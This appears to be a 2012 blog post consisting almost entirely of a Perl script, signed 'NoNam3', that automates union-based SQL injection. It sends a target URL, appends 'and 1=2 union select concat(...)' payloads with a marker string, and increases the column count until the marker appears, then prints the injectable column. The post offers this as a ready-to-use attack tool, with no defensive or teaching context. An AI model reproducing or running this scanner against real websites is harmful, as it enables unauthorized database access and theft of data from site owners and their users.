Pages

08 November 2012

Search Bug SQL injection union


#!/usr/bin/perl
#Make By NoNam3
#My Blog is D4wFl1N@blogspot.com
use strict;
use warnings;
use LWP::UserAgent;

my $ua=LWP::UserAgent->new();
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; en; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4");

my $cargv=@ARGV;
if ($cargv!=1) {
	print "ARGV wrong please check\nTheme:\n";
	exit;
}

(my $target)=@ARGV;
my $i=1;
my $url=$target.'+and+1=2+union+select+concat(0x426f6e6774726f70,'.$i.',0x426f6e6774726f70)';
my $respone=$ua->get($url.'--');
my $content=$respone->content;

print "[+] Start Scan\n\n";
while (!($content=~/Bongtrop(.*?)Bongtrop/)) {
	$i++;
	$url.=',concat(0x426f6e6774726f70,';
	$url.="$i";
	$url.=',0x426f6e6774726f70)';
	$respone=$ua->get($url.'--');
	$content=$respone->content;
	if ($i==100) {
		print "[-] Don't Have Bug\n\n";
		print "Make By Pongsakorn";
		exit;
	}
}
(my $magic)=$content=~/Bongtrop(.*?)Bongtrop/;

print "[+] Max Number is $i\n[+] Bug Number is $magic\n\n";
print "Make By NoNam3\n";

0 comments: